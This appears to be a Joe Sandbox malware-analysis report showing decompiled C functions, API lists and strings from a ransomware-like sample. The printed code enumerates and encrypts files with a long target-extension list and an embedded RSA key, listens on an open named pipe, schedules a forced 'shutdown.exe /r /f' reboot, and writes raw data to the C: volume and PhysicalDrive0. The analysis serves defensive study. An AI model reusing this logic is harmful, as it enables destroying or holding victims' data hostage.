    C-Code - Quality: 85%
    			E011E1038(void* _a4) {
				char _v10;
				char _v12;
				char _v16;
				void* _v20;
				int _v24;
				void* _v28;
				long _v32;
				void _v63;
				void _v64;
				void _v88;
				void _v96;
				char _v343;
				void _v359;
				void _v360;
				void _v623;
				char _v624;
				int _t55;
				void* _t63;
				signed int _t64;
				int _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				void* _t74;
				void* _t75;
				signed int _t83;
				signed int _t86;
				intOrPtr _t92;
				intOrPtr _t93;
				int _t94;
				void* _t96;
				void _t97;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t113;
				void* _t114;
				void* _t115;

				_v20 = 0;
				_v624 = 0;
				memset( &_v623, 0, 0x103);
				_v360 = 0;
				memset( &_v359, 0, 0x103);
				_t86 = 6;
				_v96 = 0;
				_t55 = memset( &_v88, 0, _t86 << 2);
				_push(7);
				_v64 = 0;
				memset( &_v63, _t55, 0 << 2);
				_t113 = _t110 + 0x30;
				asm("stosw");
				_v16 = 0x5c2e5c5c;
				_v12 = 0x3a30;
				_v10 = 0;
				_v32 = 0;
				asm("stosb");
				if(_a4 == 0) {
					return 0xa0;
				}
				memset(_a4, 0, 0x104);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t114 = _t113 + 0xc;
				asm("movsb");
				_v343 = 0;
				if(GetSystemDirectoryA( &_v624, 0x104) != 0) {
					_v12 = _v624;
					_t23 =  &_v16; // 0x5c2e5c5c
					_t63 = CreateFileA(_t23, 0, 3, 0, 3, 0, 0);
					_v28 = _t63;
					if(_t63 == 0xffffffff) {
						goto L2;
					}
					_t67 = DeviceIoControl(_t63, 0x560000, 0, 0,  &_v96, 0x20,  &_v32, 0); // executed
					if(_t67 != 0) {
						_push(0xa);
						_push( &_v64);
						_push(_v88);
						L011EA4DE();
						_t69 =  &_v360;
						_t115 = _t114 + 0xc;
						_t96 = _t69 + 1;
						do {
							_t92 =  *_t69;
							_t69 = _t69 + 1;
						} while (_t92 != 0);
						_t103 = _t69 - _t96;
						_t71 =  &_v64;
						_t108 = _t71 + 1;
						do {
							_t93 =  *_t71;
							_t71 = _t71 + 1;
						} while (_t93 != 0);
						_t94 = _t71 - _t108;
						_v24 = _t94;
						if(_t94 + _t103 + 1 <= 0x104) {
							if(_t103 <= 0) {
								_t109 = _a4;
								L20:
								_t74 = _t109;
								_t43 = _t74 + 1; // 0x3a31
								_t104 = _t43;
								do {
									_t97 =  *_t74;
									_t74 = _t74 + 1;
								} while (_t97 != 0);
								_t75 = _t74 - _t104;
								if(_t94 > 0) {
									_t105 = _t94 + _t75;
									if(_t105 < 0x104) {
										memcpy(_t75 + _t109,  &_v64, _v24);
										 *((char*)(_t105 + _t109)) = 0;
									}
								}
								L25:
								CloseHandle(_v28);
								return _v20;
							}
							if(_t103 > 0x103) {
								_t103 = 0x103;
							}
							_t109 = _a4;
							memcpy(_t109,  &_v360, _t103);
							_t94 = _v24;
							_t115 = _t115 + 0xc;
							 *((char*)(_t109 + _t103)) = 0;
							goto L20;
						}
						_v20 = 0x8007007a;
						goto L25;
					}
					_t83 = GetLastError();
					if(_t83 > 0) {
						_t83 = _t83 & 0x0000ffff | 0x80070000;
					}
					_v20 = _t83;
					goto L25;
				}
				L2:
				_t64 = GetLastError();
				if(_t64 > 0) {
					return _t64 & 0x0000ffff | 0x80070000;
				}
				return _t64;
			}











































    0x011e1054
    0x011e1057
    0x011e105d
    0x011e106b
    0x011e1071
    0x011e107b
    0x011e1081
    0x011e1084
    0x011e1086
    0x011e1088
    0x011e108f
    0x011e108f
    0x011e1091
    0x011e1093
    0x011e109a
    0x011e10a0
    0x011e10a3
    0x011e10a6
    0x011e10aa
    0x00000000
    0x011e1221
    0x011e10b9
    0x011e10c9
    0x011e10ca
    0x011e10cb
    0x011e10cc
    0x011e10cd
    0x011e10db
    0x011e10dd
    0x011e10eb
    0x011e1117
    0x011e111b
    0x011e111f
    0x011e1125
    0x011e112b
    0x00000000
    0x00000000
    0x011e1140
    0x011e1148
    0x011e1166
    0x011e116b
    0x011e116c
    0x011e116f
    0x011e1174
    0x011e117a
    0x011e117d
    0x011e1180
    0x011e1180
    0x011e1182
    0x011e1183
    0x011e1189
    0x011e118b
    0x011e118e
    0x011e1191
    0x011e1191
    0x011e1193
    0x011e1194
    0x011e119a
    0x011e11a0
    0x011e11a8
    0x011e11b5
    0x011e11de
    0x011e11e1
    0x011e11e1
    0x011e11e3
    0x011e11e3
    0x011e11e6
    0x011e11e6
    0x011e11e8
    0x011e11e9
    0x011e11ed
    0x011e11f1
    0x011e11f3
    0x011e11fc
    0x011e1208
    0x011e1210
    0x011e1210
    0x011e11fc
    0x011e1213
    0x011e1216
    0x00000000
    0x011e121c
    0x011e11be
    0x011e11c0
    0x011e11c0
    0x011e11c2
    0x011e11ce
    0x011e11d3
    0x011e11d6
    0x011e11d9
    0x00000000
    0x011e11d9
    0x011e11aa
    0x00000000
    0x011e11aa
    0x011e114a
    0x011e1152
    0x011e1159
    0x011e1159
    0x011e115e
    0x00000000
    0x011e115e
    0x011e10ed
    0x011e10ed
    0x011e10f5
    0x00000000
    0x011e1100
    0x011e122a

    APIs
    • memset.MSVCRT ref: 011E105D
    • memset.MSVCRT ref: 011E1071
    • memset.MSVCRT ref: 011E10B9
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 011E10E3
    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E10ED
    • CreateFileA.KERNEL32(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 011E111F
    • DeviceIoControl.KERNEL32(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 011E1140
    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E114A
    • _itoa.MSVCRT ref: 011E116F
    • memcpy.MSVCRT ref: 011E11CE
    • memcpy.MSVCRT ref: 011E1208
    • CloseHandle.KERNEL32(?), ref: 011E1216
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1973, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 144
    C-Code - Quality: 94%
    			E011E1973(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v532;
				short _v540;
				short _v1044;
				short _v1052;
				short _v1572;
				char _v1576;
				short _v1580;
				char _v1584;
				struct _WIN32_FIND_DATAW _v2164;
				void* _v2168;
				signed int _v2172;
				int _t40;
				void* _t44;
				intOrPtr* _t45;
				int _t47;
				intOrPtr* _t48;
				WCHAR* _t53;
				long _t66;
				intOrPtr* _t70;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t84;
				signed int _t85;
				void* _t87;

				_t87 = (_t85 & 0xfffffff8) - 0x870;
				if(_a8 == 0) {
					L35:
					return _t40;
				}
				_t40 = PathCombineW( &_v1044, _a4, "*");
				if(_t40 == 0) {
					goto L35;
				}
				_t40 = FindFirstFileW( &_v1052,  &_v2164); // executed
				_v2168 = _t40;
				if(_t40 != 0xffffffff) {
					do {
						_t83 = _a12;
						_t44 =  *(_a12 + 0x1c);
						if(_t44 == 0) {
							L7:
							_t70 = ".";
							_t45 =  &(_v2164.cFileName);
							while(1) {
								_t76 =  *_t45;
								if(_t76 !=  *_t70) {
									break;
								}
								if(_t76 == 0) {
									L12:
									_t45 = 0;
									L14:
									if(_t45 == 0) {
										goto L33;
									} else {
										_t71 = L"..";
										_t48 =  &(_v2164.cFileName);
										while(1) {
											_t77 =  *_t48;
											if(_t77 !=  *_t71) {
												break;
											}
											if(_t77 == 0) {
												L20:
												_t48 = 0;
												L22:
												if(_t48 != 0 && PathCombineW( &_v1572, _a4,  &(_v2164.cFileName)) != 0) {
													if((_v2172 & 0x00000010) == 0 || (_v2172 & 0x00000400) != 0) {
														_t53 = PathFindExtensionW( &(_v2164.dwReserved0));
														_t72 =  &(_v2164.dwReserved0);
														_t78 = _t72 + 2;
														do {
															_t84 =  *_t72;
															_t72 = _t72 + 2;
														} while (_t84 != 0);
														if(_t53 != _t87 + 0x3c + (_t72 - _t78 >> 1) * 2) {
															wsprintfW( &_v540, L"%ws.", _t53);
															_t87 = _t87 + 0xc;
															if(StrStrIW(L".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.",  &_v532) != 0) {
																E011E189A( &_v1576, _a12); // executed
															}
														}
													} else {
														if(StrStrIW(L"C:\\Windows;",  &_v1580) == 0) {
															E011E1973( &_v1584, _a8 - 1, _t83); // executed
														}
													}
												}
												goto L33;
											}
											_t79 =  *((intOrPtr*)(_t48 + 2));
											_t14 = _t71 + 2; // 0x2e
											if(_t79 !=  *_t14) {
												break;
											}
											_t48 = _t48 + 4;
											_t71 = _t71 + 4;
											if(_t79 != 0) {
												continue;
											}
											goto L20;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										goto L22;
									}
								}
								_t80 =  *((intOrPtr*)(_t45 + 2));
								_t11 = _t70 + 2; // 0x2e0000
								if(_t80 !=  *_t11) {
									break;
								}
								_t45 = _t45 + 4;
								_t70 = _t70 + 4;
								if(_t80 != 0) {
									continue;
								}
								goto L12;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L14;
						}
						_t66 = WaitForSingleObject(_t44, 0);
						if(_t66 == 0 || _t66 == 0xffffffff) {
							break;
						} else {
							goto L7;
						}
						L33:
						_t47 = FindNextFileW(_v2168,  &_v2164); // executed
					} while (_t47 != 0);
					_t40 = FindClose(_v2168);
				}
			}
































    0x011e1979
    0x011e1985
    0x011e1b46
    0x011e1b4b
    0x011e1b4b
    0x011e199b
    0x011e19a3
    0x00000000
    0x00000000
    0x011e19b6
    0x011e19bc
    0x011e19c3
    0x011e19cf
    0x011e19cf
    0x011e19d2
    0x011e19d7
    0x011e19f3
    0x011e19f3
    0x011e19f8
    0x011e19fc
    0x011e19fc
    0x011e1a02
    0x00000000
    0x00000000
    0x011e1a07
    0x011e1a1e
    0x011e1a1e
    0x011e1a27
    0x011e1a29
    0x00000000
    0x011e1a2f
    0x011e1a2f
    0x011e1a34
    0x011e1a38
    0x011e1a38
    0x011e1a3e
    0x00000000
    0x00000000
    0x011e1a43
    0x011e1a5a
    0x011e1a5a
    0x011e1a63
    0x011e1a65
    0x011e1a8e
    0x011e1ac7
    0x011e1acd
    0x011e1ad1
    0x011e1ad4
    0x011e1ad4
    0x011e1ad7
    0x011e1ada
    0x011e1ae9
    0x011e1af9
    0x011e1aff
    0x011e1b13
    0x011e1b20
    0x011e1b20
    0x011e1b13
    0x011e1a9a
    0x011e1aab
    0x011e1abb
    0x011e1abb
    0x011e1aab
    0x011e1a8e
    0x00000000
    0x011e1a65
    0x011e1a45
    0x011e1a49
    0x011e1a4d
    0x00000000
    0x00000000
    0x011e1a4f
    0x011e1a52
    0x011e1a58
    0x00000000
    0x00000000
    0x00000000
    0x011e1a58
    0x011e1a5e
    0x011e1a60
    0x00000000
    0x011e1a60
    0x011e1a29
    0x011e1a09
    0x011e1a0d
    0x011e1a11
    0x00000000
    0x00000000
    0x011e1a13
    0x011e1a16
    0x011e1a1c
    0x00000000
    0x00000000
    0x00000000
    0x011e1a1c
    0x011e1a22
    0x011e1a24
    0x00000000
    0x011e1a24
    0x011e19dc
    0x011e19e4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e1b25
    0x011e1b2e
    0x011e1b34
    0x011e1b40
    0x011e1b40

    APIs
    • PathCombineW.SHLWAPI(?,?,011F0A6C), ref: 011E199B
    • FindFirstFileW.KERNELBASE(?,?), ref: 011E19B6
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 011E19DC
    • PathCombineW.SHLWAPI(?,?,?), ref: 011E1A7B
    • StrStrIW.SHLWAPI(C:\Windows;,?), ref: 011E1AA7
    • PathFindExtensionW.SHLWAPI(?), ref: 011E1AC7
    • wsprintfW.USER32 ref: 011E1AF9
    • StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 011E1B0F
      • Part of subcall function 011E189A: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 011E18B3
      • Part of subcall function 011E189A: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011E1B25,?,?), ref: 011E18CC
      • Part of subcall function 011E189A: CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,011E1B25,?), ref: 011E18F2
      • Part of subcall function 011E189A: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,011E1B25,?), ref: 011E1907
      • Part of subcall function 011E189A: CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,011E1B25,?), ref: 011E1924
      • Part of subcall function 011E189A: FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,011E1B25,?), ref: 011E1932
      • Part of subcall function 011E189A: UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,011E1B25,?), ref: 011E1939
      • Part of subcall function 011E189A: CloseHandle.KERNEL32(?), ref: 011E1942
      • Part of subcall function 011E189A: CloseHandle.KERNEL32(011E1B25), ref: 011E194B
    • FindNextFileW.KERNELBASE(?,?), ref: 011E1B2E
    • FindClose.KERNEL32(?), ref: 011E1B40
    Strings
    • .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or, xrefs: 011E1B0A
    • %ws., xrefs: 011E1AF3
    • C:\Windows;, xrefs: 011E1AA2
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1983
    • =B|v, xrefs: 011E1AF9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E73FD, Relevance: 25.6, APIs: 17, Instructions: 125
    C-Code - Quality: 92%
    			E011E73FD(WCHAR* _a4) {
				void* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES _v28;
				struct _SECURITY_DESCRIPTOR* _t25;
				void* _t30;
				int _t31;
				int _t34;
				WCHAR* _t44;
				void* _t50;
				void* _t51;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28.nLength = 0xc;
				_v28.bInheritHandle = 0;
				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
				_v28.lpSecurityDescriptor = _t25;
				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
					return 0;
				} else {
					while(1) {
						L3:
						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
						_v8 = _t30;
						if(_t30 == 0xffffffff) {
							continue;
						}
						L4:
						_t31 = ConnectNamedPipe(_t30, 0); // executed
						if(_t31 == 0) {
							L18:
							CloseHandle(_v8);
							do {
								goto L3;
							} while (_t30 == 0xffffffff);
							goto L4;
						} else {
							_t50 = 0x1e;
							do {
								_t50 = _t50 - 1;
								_v12 = 0;
								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
								if(_t34 == 0) {
									goto L9;
								}
								if(_v12 != 0) {
									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
									if(_t51 != 0) {
										_v16 = 0;
										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
											_t44 = StrChrW(_t51, 0x3a);
											if(_t44 != 0) {
												 *_t44 = 0;
												E011E6DE0(_t51,  &(_t44[1]), 2);
											}
										}
										HeapFree(GetProcessHeap(), 0, _t51);
									}
									L17:
									FlushFileBuffers(_v8);
									DisconnectNamedPipe(_v8);
									goto L18;
								}
								Sleep(0x3e8); // executed
								L9:
							} while (_t50 != 0);
							goto L17;
						}
						L3:
						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
						_v8 = _t30;
					}
				}
			}














    0x011e7411
    0x011e7412
    0x011e7415
    0x011e741a
    0x011e7421
    0x011e7427
    0x011e742d
    0x011e7432
    0x011e7542
    0x00000000
    0x011e745e
    0x011e745e
    0x011e746e
    0x011e7474
    0x011e747a
    0x00000000
    0x00000000
    0x011e747c
    0x011e747e
    0x011e7486
    0x011e752e
    0x011e7531
    0x011e745e
    0x00000000
    0x00000000
    0x00000000
    0x011e748c
    0x011e748e
    0x011e748f
    0x011e749a
    0x011e749b
    0x011e749e
    0x011e74a6
    0x00000000
    0x00000000
    0x011e74ab
    0x011e74cc
    0x011e74d0
    0x011e74da
    0x011e74e9
    0x011e74f6
    0x011e74fe
    0x011e7502
    0x011e750c
    0x011e750c
    0x011e74fe
    0x011e7516
    0x011e7516
    0x011e751c
    0x011e751f
    0x011e7528
    0x00000000
    0x011e7528
    0x011e74b2
    0x011e74b8
    0x011e74b8
    0x00000000
    0x011e74bc
    0x011e745e
    0x011e746e
    0x011e7474
    0x011e7477
    0x011e745e

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 011E7424
    • HeapAlloc.KERNEL32(00000000), ref: 011E7427
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 011E743B
    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 011E7450
    • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 011E746E
    • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 011E747E
    • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 011E749E
    • Sleep.KERNELBASE(000003E8), ref: 011E74B2
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E74C3
    • HeapAlloc.KERNEL32(00000000), ref: 011E74C6
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 011E74E1
    • StrChrW.SHLWAPI(00000000,0000003A), ref: 011E74F6
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7513
    • HeapFree.KERNEL32(00000000), ref: 011E7516
    • FlushFileBuffers.KERNEL32(?), ref: 011E751F
    • DisconnectNamedPipe.KERNEL32(?), ref: 011E7528
    • CloseHandle.KERNEL32(?), ref: 011E7531
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1BA0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 93
    APIs
    • CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000,F0000000,?,?,?,?,011E1D43,?), ref: 011E1BC6
    • LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,011E1D43,?), ref: 011E1BD6
    • CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000,?,?,?,011E1D43,?), ref: 011E1BF8
    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C1A
    • LocalAlloc.KERNEL32(00000040,011E1D43,?,?,?,011E1D43,?), ref: 011E1C25
    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C42
    • CryptImportKey.ADVAPI32(5708458B,?,011E1D43,00000000,00000000,011E1D4F,?,?,?,011E1D43,?), ref: 011E1C5A
    • LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C66
    • LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C6F
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1BD0
    • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 011E1BF3
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E84DF, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 82
    C-Code - Quality: 100%
    			E011E84DF() {
				struct _SYSTEMTIME _v20;
				short _v1580;
				short _v1582;
				short _v3628;
				void* _t23;
				signed int _t24;
				short _t40;
				WCHAR* _t41;
				short _t44;
				signed int _t45;
				signed int _t53;
				signed int _t54;
				void* _t56;

				_t44 = 0;
				GetLocalTime( &_v20);
				_t23 = E011E6973();
				if(_t23 < 0xa) {
					_t23 = 0xa;
				}
				_t45 = 0x3c;
				_t24 = _t23 + 3;
				_t54 = 0x18;
				_t56 = (_v20.wMinute & 0x0000ffff) + _t24 % _t45;
				_t53 = ((_v20.wHour & 0x0000ffff) + _t24 / _t45) % _t54;
				if(GetSystemDirectoryW( &_v1580, 0x30c) != 0 && PathAppendW( &_v1580, L"shutdown.exe /r /f") != 0) {
					if(E011E8494() == 0) {
						wsprintfW( &_v3628, L"at %02d:%02d %ws", _t53, _t56,  &_v1580);
					} else {
						_t41 = L"/RU \"SYSTEM\" ";
						if(( *0x11ff144 & 0x00000004) == 0) {
							_t41 = 0x11f4388;
						}
						wsprintfW( &_v3628, L"schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d", _t41,  &_v1580, _t53, _t56);
					}
					_v1582 = 0;
					_t40 = E011E83BD( &_v3628, 0); // executed
					_t44 = _t40;
				}
				return _t44;
			}
















    0x011e84ef
    0x011e84f1
    0x011e84f7
    0x011e84ff
    0x011e8503
    0x011e8503
    0x011e8506
    0x011e8507
    0x011e8510
    0x011e852f
    0x011e8531
    0x011e853b
    0x011e855e
    0x011e85a9
    0x011e8560
    0x011e8567
    0x011e856c
    0x011e856e
    0x011e856e
    0x011e8589
    0x011e858f
    0x011e85b4
    0x011e85c2
    0x011e85c7
    0x011e85c7
    0x011e85cf

    APIs
    • GetLocalTime.KERNEL32(?,00000000), ref: 011E84F1
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8533
    • PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 011E854D
      • Part of subcall function 011E8494: memset.MSVCRT ref: 011E84AD
      • Part of subcall function 011E8494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 011E84C6
    • wsprintfW.USER32 ref: 011E8589
    • wsprintfW.USER32 ref: 011E85A9
      • Part of subcall function 011E83BD: wsprintfW.USER32 ref: 011E83DC
      • Part of subcall function 011E83BD: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
      • Part of subcall function 011E83BD: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
      • Part of subcall function 011E83BD: lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
      • Part of subcall function 011E83BD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
      • Part of subcall function 011E83BD: Sleep.KERNELBASE(011E85C7), ref: 011E8485
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8D5A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
    C-Code - Quality: 100%
    			E011E8D5A(void* __ecx) {
				signed int _v8;
				void _v28;
				long _v32;
				void* _t8;
				void* _t9;
				int _t12;
				void* _t23;
				void* _t24;
				void* _t26;

				_t24 = __ecx;
				_t8 = CreateFileA("\\\\.\\C:", 0x40000000, 3, 0, 3, 0, 0); // executed
				_t26 = _t8;
				if(_t26 != 0) {
					_t12 = DeviceIoControl(_t26, 0x70000, 0, 0,  &_v28, 0x18,  &_v32, 0); // executed
					if(_t12 != 0) {
						_t23 = LocalAlloc(0, _v8 * 0xa);
						if(_t23 != 0) {
							SetFilePointer(_t26, _v8, 0, 0); // executed
							WriteFile(_t26, _t23, _v8,  &_v32, 0); // executed
							LocalFree(_t23);
						}
					}
					CloseHandle(_t26);
				}
				if(( *0x11ff104 & 0x00000008) == 0) {
					L7:
					_t9 = E011E8CBF();
					goto L8;
				} else {
					_t9 = E011E14A9(_t24); // executed
					if(_t9 == 0) {
						L8:
						return _t9;
					}
					goto L7;
				}
			}












    0x011e8d5a
    0x011e8d79
    0x011e8d7f
    0x011e8d83
    0x011e8d9a
    0x011e8da2
    0x011e8db3
    0x011e8db7
    0x011e8dc0
    0x011e8dd2
    0x011e8dd9
    0x011e8dd9
    0x011e8db7
    0x011e8de0
    0x011e8de0
    0x011e8ded
    0x011e8df8
    0x011e8df8
    0x00000000
    0x011e8def
    0x011e8def
    0x011e8df6
    0x011e8dfd
    0x011e8e03
    0x011e8e03
    0x00000000
    0x011e8df6

    APIs
    • CreateFileA.KERNEL32(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8D79
    • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D9A
    • LocalAlloc.KERNEL32(00000000,?), ref: 011E8DAD
    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 011E8DC0
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 011E8DD2
    • LocalFree.KERNEL32(00000000), ref: 011E8DD9
    • CloseHandle.KERNEL32(00000000), ref: 011E8DE0
      • Part of subcall function 011E8CBF: CreateFileA.KERNEL32(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8CDB
      • Part of subcall function 011E8CBF: DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D04
